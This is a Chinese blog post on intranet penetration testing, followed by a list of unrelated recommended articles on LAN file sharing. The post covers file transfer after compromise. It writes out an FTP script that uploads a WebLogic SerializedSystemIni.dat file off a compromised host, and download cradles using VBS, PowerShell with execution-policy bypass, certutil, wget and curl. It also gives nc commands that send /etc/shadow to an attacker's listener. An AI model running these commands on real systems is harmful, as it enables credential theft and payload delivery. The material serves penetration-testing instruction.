内网文件传输

最新推荐文章于 2024-05-21 10:12:58 发布
最新推荐文章于 2024-05-21 10:12:58 发布
阅读量6.4k 收藏 3
点赞数
分类专栏: 内网安全 文章标签: 内网 渗透 传输
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jpygx123/article/details/84560335
版权

文件传输方法:

windows

FTP(ftp -s:1.txt【-s将后面跟的1.txt内容全部当做命令行执行】)(FTP传文件比较万能,任意类型文件都可上传)

实践:

现有公网IP: 101.198.183.60,内网IP: 192.168.0.84的开发webloginc 7001端口并且有反序列化漏洞的主机一台,以及

公网IP: 101.198.183.68,内网IP: 192.168.0.98开放ftp服务的主机一台。

实施攻击的是不同网段的win7攻击机(可以访问公网,但是内网不可访问)。

使用win7攻击机上的WebLogicExploit工具远程连接weblogic主机

1、echo open 192.168.0.98 2121 >> 1.txt         //登陆FTP服务器
2、echo guoxiang>>1.txt                              //用户名
3、echo password>>1.txt                              //密码
4、echo bin>>1.txt                              //开始
5、echo put C:\Oracle\Middleware\user_projects\domains\college\security\SerializedSystemIni.dat>> 1.txt                      //下载程序
6、echo bye>>1.txt                              //关闭FTP服务器

然后执行ftp -s:1.txt

发现在ftp主机中出现了上传的文件。

用同一内网下含有反序列化任意命令执行漏洞的weblogic主机做跳板,用weblogic主机去攻击同一内网下的ftp主机。

 

VBS(echo 下载文件程序>>loader.vbs cscript loader.vbs远程文件位置保存文件位置)

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments( 0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> loader.vbs

cscript loader.vbs http://192.168.0.98:7001/test/putty.exe C:\Users\linghuchong\Desktop\Tools\putty.exe

putty.exe

Powershell(powershell-exec bypass-c(new-object System.Net.WebClient).DownloadFile(“远程文件位置“保存文件位置))

 powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.111.1:8080/test/putty.exe','C:\Users\linghuchong\Desktop\Tools\putty1.exe')
 
putty1.exe

certain(certutil.exe -urlcache -split -f 远程文件位置)

certutil.exe -urlcache -split -f http://192.168.111.1:8080/test/putty.exe

certutil.exe -urlcache -split -f http://192.168.111.1:8080/test/putty.exe delete        //删除缓存

putty.exe

 

Linux

攻击端监听端口,并重定向:

nc -nvv -lp 4455 > shaodw.txt

目标机将文件内容回传:

nc 192.168.111.251 4455 < /etc/shadow

Wget(下载)

wget http://192.168.111.1:8080/test/putty.exe

curl(支持文件的上传和下载,是综合传输工具,但按传统,习惯称url为下载工具。)

curl -O http://192.168.111.1:8080/test/putty.exe

 

 

 

 

 

 

 

 

 

 

 

 

 

 

花自飘零丶水自流
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网ip如何传输文件
Know Destiny的博客
12-07 4913
内网ip如何传输文件 1.一种是scp scp 目录/文件名.文件格式 目标服务器用户名@ip地址:目标服务器目录 例如:scp /usr/sdc/local/web/start.sh root@要传输的ip: /usr/sdc/local/web/ 2.建立隧道 进入带有公网ip的ip 找到属性 点击添加 点击新建,输入内网ip,端口输入刚才填入的722/822/922之类的,输入账号密码后,点击确定 连接成功,下次直接点击就好不用再次连接 ...
【电脑使用】两台电脑局域网共享文件
热门推荐
Explore_Zhou
08-08 1万+
一般来说,电脑之间想要实现文件交互,一般需要使用媒介,比如U盘、移动硬盘等,但如果文件非常大,通过这种方法就有点麻烦了,毕竟需要复制两遍(或者需要将文件放到某个外置设备但电脑无法连接该设备而需要另一台电脑作为媒介的时候),那么这个时候就需要用到电脑之间互传文件了。从上面的一系列步骤来看,即使有一些设置可以长期保存,但用电脑共享文件总的来说还是很复杂的,但在某些特殊的场景,尤其是大文件的传输,这种方法则非常实用。!!(手动滑稽)参考链接。
内外网传输工具及其优缺点探讨:FileLink跨网文件传输
最新发布
m0_69398711的博客
05-21 484
总结来说,每种内外网传输工具都有其独特的优缺点,用户在选择时应结合自身的实际需求和场景进行权衡。如果需要频繁且大量地传输文件,且对安全性有较高要求,那么FileLink跨网文件传输可能是更好的选择;如果只是偶尔需要传输一些小文件,并且对便捷性有较高的要求,那么基于云的存储服务或即时通讯软件可能更为合适。U盘作为企业文件传输的常用方式,其体积小,容量大,不受网络隔离的限制,可以支持在不同网络、设备之间可以进行文件传输,但其缺点是每一次文件传输都需要人为控制,无法提供合规的审批流程、审计日志。邮件附件。
一种在局域网内两台电脑互传文件的方法windows或linux
weixin_49777848的博客
06-26 2125
摘要:本文介绍一种可以在局域网内互传文件的方法,非常适合新手,不需要太多编程内容,方法借助filezllia软件,从windows10中传送文件到linux ubuntu22.4中,本实验于2023.6.26实验成功。【4】windows中打开Filezilla软件,输入刚刚查看的ip地址,linux的用户名,linux的密码,端口处填:22。就可以连接linux系统了,具体如下图。【5】然后在这个软件的左半边就是windows中的文件夹,右边就是linux中的文件夹,现在已经可以互相传文件了。
windows局域网传文件5种常用方法
lxyoucan的博客
09-17 1万+
如果大家有更好的局域网传输方法,欢迎评论区交流。
小试跨平台局域网文件传输工具NitroShare,几点感想
Purpleendurer@CSDN
01-09 1380
随着电脑系统国产化的推进,单位用的OA系统已转移到国产电脑上了,但是国产电脑上的操作系统基于Linux,软件商店里可选的应用软件还不够多,功能也还有待提高。为了提高处理效率,经常需要把文件从国产电脑传到Windows平台上处理,但Linux上的QQ的功能比Windows上的少了许多,比如不支持文件夹传输。NictroShare尽管是跨平台的,但各平台的界面基本是一致的,操作起来没有差别,界面简洁,传输功能完备,传输速度也很快。Device name:设置设备名称,方便识别,图中设为abc。
C# WPF内网文件传输.zip
11-13
本文将深入探讨如何使用C# WPF进行内网文件传输,这是一个对于网络编程和桌面应用开发者非常实用的技术。 首先,理解内网文件传输的核心概念是必要的。内网,或局域网(LAN),是指在一个有限地理范围内的计算机...
内网文件传输工具.rar
09-25
小巧而强大的文件传送工具,传输速度很快,支持批量文件传输,支持断点续传,支持整个文件夹的传输(包含文件夹下的所有文件以及子文件夹),支持多个批次的文件同时传输。可在局域网内使用,也可在有公共IP地址的外...
网吧内网文件传输工具
10-27
因此,针对这种情况,开发了专门的“网吧内网文件传输工具”,旨在提供一个安全、快速且便捷的方式来在网吧内部网络中分享文件。这种工具的主要目标是确保用户能在不干扰网络稳定性和不影响其他用户上网体验的前提下...
内网文件传输APP (支持电脑手机文件互传)
05-23
内网文件传输APP(支持电脑手机文件互传) - 支持手机本地文件的浏览功能,点击文件即可快速分享。(备注:手机端暂不支持文件删除) - 软件自带WEB管理界面,支持网页端进行文件的上传、删除操作。(备注:上传操作请求均...
内网工作文件传送工具
09-02
内网工作文件传送工具是一款专为内部网络设计的高效大文件传输软件,它极大地优化了在局域网内的数据交换过程。这款工具的独特之处在于,它不需要依赖外部服务器,也不需要用户连接到互联网,从而确保了文件传输的...
局域网传输利器在局域网内,可以非常快速的传送近10G的大文件,时间大概5分钟
03-31
局域网传输利器在局域网内,可以非常快速的传送近10G的大文件,时间大概5分钟
这11款文件传输工具简单好用,基本涵盖所有传输场景!【带私活源码】
m0_68103666的博客
04-27 3039
在工作中经常会遇到文件传输的需求,今天为大家推荐几款简单好用的文件传输工具。
局域网计算机如何传输文件,局域网文件传输,教您局域网如何传输文件
weixin_35336727的博客
07-24 6213
相信用户经常用到的方法是文件共享、QQ间拷贝、电子邮件等,但这些都存在一定的弊端,假如我们使用局域网来传输文件的话,就不会受到移动存储设备的限制,而能够实现较远距离的传输了,那么我们如何使用局域网传输文件呢?下面,小编就来跟大家讲解局域网传输文件的操作流程了。在两台计算机之间进行文件传输,我们往往是使用U盘或者其他移动存储设备来进行操作,但是这样比较费时间,也会受到计算机之间距离的限制。那么为何不...
内网渗透中Windows下的内网传输技术
wo41ge的博客
12-18 578
前言 有时候我们拿到一个不能上传shell,但可以命令执行的windows服务器时,可以通过多种方法进行文件上传和下载。 ftp 环境部署 首先,ftp支持ASCII码传输、也支持二进制传输,因此完全可以满足我们的上传下载需求。 我们可以在本地服务器先搭建一个ftp服务器 创建一个用户 靶机连接上ftp服务器之后,我们就可以进行上传、下载操作了。 上传和下载 ftp可以读取txt中的命令并执行,因此可以把需要执行的命令写入到一个txt文件中 echo open ip >>ftp.txt
内网中服务器之间如何进行文件传输
WziH_CSDN的博客
02-05 3849
前提无法联网下载插件,只有SSH连接和xsell工具。 第一种办法:scp命令 scp就是secure copy,一个在linux下用来进行远程拷贝文件的命令。有时我们需要获得远程服务器上的某个文件,该服务器既没有配置ftp服务器,也没有做共享,无法通过常规途径获得文件时,只需要通过简单的scp命令便可达到目的。 1.将本机文件复制到远程服务器上 #scp /home/administrator/news.txt root@192.168.6.129:/etc/squid /home/administrat
局域网传输/共享大文件
m0_37307022的博客
12-01 1万+
局域网传输/共享大文件 前段时间和同学传一个4g的数据。想到如下几个点子 通过qq进行传输,但是要上传,还要下载,还要网速给力才行,而且花费的可是双倍的时间,一个上传一个下载,等的黄花菜都凉了。 通过u盘进行传输,先要复制文件到U盘里,然后U盘给同学,然后再剪切,这个纯粹就是看电脑内存,输入输出怎么样,花的也是双倍的时间来做这件事 本着做事怎么简单怎么来的原则,我在想有没有不用双倍时间进行拷贝...
怎么将内网文件传输内网的另一个服务器
全场梦游c的博客
09-11 4122
前提无法联网下载插件,只有SSH连接和xsell工具。 第一种办法:scp命令 scp就是secure copy,一个在linux下用来进行远程拷贝文件的命令。有时我们需要获得远程服务器上的某个文件,该服务器既没有配置ftp服务器,也没有做共享,无法通过常规途径获得文件时,只需要通过简单的scp命令便可达到目的。 1.将本机文件复制到远程服务器上 #scp /home/administra...
内网文件的传输与下载
weixin_44255856的博客
08-22 3316
SCP 本地到远程 将本地文件上传到服务器 scp -P 2222 /home/tmp/flag.php root@host_ip:/root/tmp/ root@host_ip表示使用root用户登陆远程服务器 /home/tmp/flag.php表示本地上传的文件 /root/tmp表示保存在远程服务器上的目录和文件名 -P 表示选择端口,注意-p已经被rcp使用; 远程到本地 scp ...
linux使用内网传文件
05-30
1. SCP(Secure Copy Protocol):SCP 是一个安全的文件传输协议,它基于 SSH 协议,可以在本地和远程主机之间安全地传输文件。你可以使用以下命令将文件从本地复制到远程主机: ``` scp /path/to/local/file ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值